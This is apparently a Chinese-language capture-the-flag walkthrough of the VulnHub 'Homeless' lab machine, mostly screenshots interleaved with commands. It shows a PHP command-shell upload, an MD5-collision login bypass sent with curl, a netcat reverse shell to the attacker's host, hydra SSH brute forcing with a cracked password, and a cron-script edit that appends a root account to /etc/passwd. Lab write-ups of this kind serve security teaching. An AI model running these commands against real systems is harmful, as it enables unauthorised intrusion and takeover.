homeless靶机
仅供个人娱乐
靶机信息
下载地址:https://www.vulnhub.com/entry/homeless-1,215/
一、主机扫描
![](https://upload-images.jianshu.io/upload_images/4664072-7c93c67a0bc84784.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-1b082b55ba0bb2c4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-cf787af05a0ff159.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4e068a2a53eb9912.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
在网页源码和页面上,我们发现User-Agent
![](https://upload-images.jianshu.io/upload_images/4664072-a57d770750116d3f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ca1adc5ffa9b4985.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-4318ea68a1d8b69d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-06a953fb830f9ea4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8ae906d6bc5407d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞利用
![](https://upload-images.jianshu.io/upload_images/4664072-ca88f5b6353a0fd9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9ecf87469ffa3d9f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
在agaent字段填上这个图片的字段 “Cyberdog Sledding Portal”
![](https://upload-images.jianshu.io/upload_images/4664072-6c0718b901a9296a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或使用字典:rockyou,来爆这个UA
![](https://upload-images.jianshu.io/upload_images/4664072-c4ea633ac03246b7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e0e54681b3c96765.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-851085d170aebf23.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
打开该网页
![](https://upload-images.jianshu.io/upload_images/4664072-a16737f6e95843f5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
上传小马
![](https://upload-images.jianshu.io/upload_images/4664072-0ad9e20f85b4c2a3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-579aff151e001c02.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
上传命令
![](https://upload-images.jianshu.io/upload_images/4664072-0cebccc0104c8aa4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
<?=`ls`; #这句代码在php里等同于<?php echo `ls`;?>,是这段代码的缩写
注意这里一定是反引号,否则无法解析
![](https://upload-images.jianshu.io/upload_images/4664072-ef89679493edfa84.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e7ff806c25040270.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
访问相关文件
![](https://upload-images.jianshu.io/upload_images/4664072-cfc6c94886f68f3e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-80eb6da444c036a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
访问相关txt文件ip
![](https://upload-images.jianshu.io/upload_images/4664072-52e958763eaea032.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-96ecae8103f27f6e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-a006a781e7457a6d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-dba976d07fa5d19b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6cba73ecb72d5526.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
逻辑就是username、password、code两两不相等,但是三者的md5相等,要求post提交的3个参数不能两两相同,但是要求md5的值相同
百度信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-d16718f2b50ed477.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e09e502e351df50e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
$ sudo apt-get install libboost-all-dev
cd python-md5-collision-master
python3 gen_coll_test.py
![](https://upload-images.jianshu.io/upload_images/4664072-40d30697e17f3af5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
curl命令传输文件
选三个文件,直接用curl命令传输过去
curl传输的用法 https://ec.haxx.se/http/http-post
![](https://upload-images.jianshu.io/upload_images/4664072-47299d754ee0bf7c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用的参数:--data-urlencodeHTTP POST data url encoded
curl --data-urlencode username@out_test_000.txt --data-urlencode password@out_test_001.txt --data-urlencode code@out_test_002.txt http://192.168.56.128/d5fa314e8577e3a7b8534a014b4dcb221de823ad/ -i
![](https://upload-images.jianshu.io/upload_images/4664072-f31972abd5ace020.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
获取到了一个SESSION eec1n77li90bsc5av8sp5k5q10
在浏览器中,F12,修改该Cookie值
访问
http://192.168.56.128/d5fa314e8577e3a7b8534a014b4dcb221de823ad/admin.php就进后台了
![](https://upload-images.jianshu.io/upload_images/4664072-d77ac42f901975fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2e56e645c42c78b9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
反弹
nc -e /bin/bash 192.168.56.129 4444
输入
python -c 'import pty; pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-c5054b2067d2a9ba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
进行信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-59ec16aa52299905.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
从python文件入手
find / -type f -user downfall 2>/dev/null #除了用户目录多了个邮件但是没权限
find / -type f -group downfall 2>/dev/null #查找属于downfall组的文件
find / -type f -perm -u=s 2>dev/null 查看sudo文件
![](https://upload-images.jianshu.io/upload_images/4664072-c117e5d298fd2233.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
爆破ssh
hydra -l downfall -P /usr/share/wordlists/rockyou.txt -t 5 ssh://192.168.56.128
![](https://upload-images.jianshu.io/upload_images/4664072-4ebb6a899847d96d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-aa8096a9a5fc20df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ssh downfall@192.168.56.128
secretlyinlove
进行信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-008247d575ec64ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
计划任务每分钟执行一次homeless.py脚本,及报错信息
第一种方式提权
![](https://upload-images.jianshu.io/upload_images/4664072-0ca584ca9da4396f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
vim /lib/logs/homeless.py
修改脚本
![](https://upload-images.jianshu.io/upload_images/4664072-af5ead7fca192187.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-f5891af49e556ee4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
获取权限成功
第二种方式提权
直接用homeless写/etc/passwd文件
生成密码
perl -e 'print crypt("HUA123",q($6$hoiLHdTI)) ."\n"'
得到信息
$6$hoiLHdTI$1.6GQT97DN3dCD13qY1cEsHCTi6TywYNbLYYmu/DTHe2h6QLxdTXRnZ9lwqDwixsRSHZ685PoJq0/jrHG.XHx/
![](https://upload-images.jianshu.io/upload_images/4664072-1e20ca13450ac04b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
更改python文件内容为
vim /lib/logs/homeless.py
#! /usr/bin/python
f = open("/etc/passwd",'a')
f.write('xiao:$6$hoiLHdTI$1.6GQT97DN3dCD13qY1cEsHCTi6TywYNbLYYmu/DTHe2h6QLxdTXRnZ9lwqDwixsRSHZ685PoJq0/jrHG.XHx/:0:0::/root:/bin/bash')
f.close()
print "hello"
![](https://upload-images.jianshu.io/upload_images/4664072-50c11215937a20bd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-18d87acef925aebd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5e4000c28a3e9c79.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9250e1ecdddbd9ec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
成功创建root权限账户
参考文章https://www.cnblogs.com/A1oe/p/12694954.html